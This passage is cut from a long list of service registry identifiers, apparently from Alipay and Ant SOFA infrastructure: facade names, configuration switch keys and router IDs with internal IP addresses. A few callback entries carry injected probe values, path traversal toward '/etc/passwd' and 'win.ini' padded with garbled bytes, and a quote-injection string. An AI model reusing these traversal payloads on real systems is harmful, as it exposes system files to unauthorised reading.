AULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.thirdparty.FpsPageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.AssetProfileDrm.switchPartition,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.databus.common.service.facade.MutexService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.taobao.notify.management.service.MsgDeliveryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csportal.biz.skyeye.drm.SkyeyeDRMManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.evaluate.EvaluationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.AccountLayoutFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.163.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ccr.facade.MobileCcrBillChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.OutdataCityserviceDisplayappAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.18.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opensupport.common.service.facade.partner.ProductSolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.163.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:antgraphconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.api.ResultServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.facade.api.TransferConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:scardcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.totalSwitchOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.venue.VenueStrategyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtRfdProdWithStyCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.fee.FeeBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.NormalDiseaseInfoFacade:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.dm.common.service.facade.api.TableQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dasbi.daas.api.table.sync.DataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.community.CommunityPropertyMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.lisa.service.alipayauth.LisaWempRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.backend.api.item.ItemRelationManageBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.cfin.loancore.common.service.facade.cf.api.query.CfArgmntInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcpromochannel.service.channel.PcPromoChannelEventMarkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.partner.resource.LocationResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.biz.sign.facade.SignFileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.api.FluxSyncSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.api.repay.LendRepayBudgetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEscape,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.spcenter.facade.isvoperation.IsvOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.taxcenter.common.service.facade.api.InnerHandleTaxExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.InvokerServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agmcenter.common.service.facade.v2.api.AgmTemplateCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zmodel.core.variables.conf.ModelVariableResource.allVariableModelStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.finriskcenter.common.facade.api.guardian.FlowActionInstanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpartner.service.facade.RigelShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promoitem.common.service.facade.api.ItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dchainconfigcenter.facade.productitem.category.api.CategoryManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.oyz.core.facade.api.BlockPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.176.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.service.facade.api.hotevent.ProdHotEventSubjectFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.56.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.biz.shared.feature.RearDetectFeatureActuator:1.0:rearSensitiveInfoDetectActuator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:minicenterAntProcessCancelCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedDepositProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.lineage.DatabusLineAgeHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.EventContextParseCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_SC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opsfree.facade.OpsfreeAbnormalDetectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.platform.common.service.facade.iface.FpdecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:yuyanchangecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.21.104.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/����\\\\����\\\\����\\\\����\\\\����\\\\����\\\\����\\\\����\\\\etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdExpandRecordQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.riskmanage.RiskManageSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KGCORE_KGWRITER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antPrivacy_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.ShopQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.rule.core.repository.drm.RepositoryConfigResource.repositoryLoaderTaskMaxSizeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ropcn.common.ability.RopDataSourceFacade:1.0:miniProgramPenaltyRecord@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:'-@@PACK_RECEIVED @@PACK_RECEIVED@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.dictionary.DictionaryCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.treasurycenter.facade.api.fund.TreasuryPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_TRISKTCC#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.ruleengine.service.ReCompareSignServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.141.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kmi.common.service.facade.KeyManagementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.word.WordCrowdMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.ExtTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:gfsettle@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.multimonitor.service.MultiMonitorRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.ArtificialLevelSortFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","aclinkelib@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_CLOUDSTRATEGY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.126.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:pcreditdecision@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.ForcastInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.biz.asset.service.PeriodAssetTransService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0:finauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.AlipayNameQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.spi.api.MobileSyncSpiService:1.0:mobilechat@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.kbjob.KbJobShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arulemng.common.service.facade.rule.RulePublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.forexprod.common.service.facade.ForexTransInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.loadTestZdatabusTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:mapi#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dadeploymentunit.facade.appx.analyse.api.IdePluginVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.college.materialtag.MaterialTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.WordDownloadManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.exriskcenter.common.service.facade.api.mng.DataFactorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:mpafront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:adatabus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapitool.facade.ipwhitelist.IpWhiteListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.biz.BizRulesQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.biz.shared.event.handler.UniformEventHandler:1.0:luckyBagTotalNumUniformRZEventHandler$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.express.query.CardBinQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:zqualitywallecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.sns.P2pBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:������������������������������������������������windows��win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanamountprod.common.service.facade.service.credit.CreditAcceptOfflineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finvirtualta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.drm.SlaveQueryDrm.starWishCountSlave,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.cif.client.drm.AntPassportSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.policy.SecurityPolicyService:1.0:simulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.147.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:${filefactory_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccounter.facade.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.aoliao.api.DxResultManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.gray.GrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_FOPSHOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_O_RISKMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkcreditmsgplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdmp.common.service.facade.crowd.MrchCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ifxtrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.192.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.framodel.core.service.facade.api.FramodelCreateOperatorContextFacade:1.0:framodelquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.AssetAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finsign.common.service.facade.finauth.service.BridgeAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antaid.common.service.facade.spi.AntaidEventSubscriber:1.0:test_event_subscriber_facade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.tradequery.facade.ProxyTradeRefundQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizExceptionNotifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.personloan.api.PlctransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.operation.facade.AssetReqOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.ItemSkuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaprod.common.service.remit.RemitErrorCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ipssautomate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OPENACCESS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.keymap.facade.dsg.api.DsgAlgoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","dacuprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.quotationcore.common.service.facade.api.stockcode.StockCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dms.common.service.ModelParseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.common.management.McommentCommonManagementUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundselling.common.service.productx.facade.ProductXBizRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.VoucherActivityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.secuprod:name=com.alipay.secuprod.biz.fund.common.FundAIPConfig.riskAssessmentUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.minicore.common.service.facade.rel.api.AppRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antforest.common.service.facade.ForestSecurityPunishFacade:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditcore.repay.service.PcreditRepayOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalproxyquery:name=com.alipay.anthubble.proxy.sla.AntHubbleSla.masterDbQueryWhitelist,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dayutrprod.common.facade.monitor.RootCauseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.query.DetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.DeployPackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:kbsales@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.UserValidateConfigDrm.finrtRiskCutFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.108.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_templateStatusChangeProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.FtpDataSourceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.CertRelatedSecretKeyOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.supergw.service.facade.transaction.MessageReceiveService:1.0:apsettlement_openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.drawndn.DrawndnInfoQueryFacade:1.0:drawndnInfoQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.management.ManagementCreditScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpromo.service.H2HServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantInfoQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.MenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.core.SearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcchaos@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.admin.AdminCityAppFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:antinvoice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.diag.common.service.facade.FaqFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:secuinfos@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:paycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkinstassetprodmng_processCallbackForReject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.StaticResourceReportConfigSwitch.enabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csplatform.service.facade.api.MessageConsumService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:psbp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_IFINFLUX_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditauthcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.inner.InstanceManipulationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.CategroyScenarioQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kbticketcenter.KbtOperateRefundTicketService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.MergeService:1.0:finvirtualta@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inststub.common.service.facade.spec.InstSpecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.portal.common.service.facade.qualityassess.ContentDistributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.177.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:BFRXATCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.AlipayNameQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.client.policynotify.fetcher.PolicyNotifyFetcher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:riskmerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:sliceSummaryTaskDataLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.lehua.LehuaCustQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.security.MobileContextFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserSecurityRiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.prod.OtpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zarcore:name=com.alipay.fc.arcore.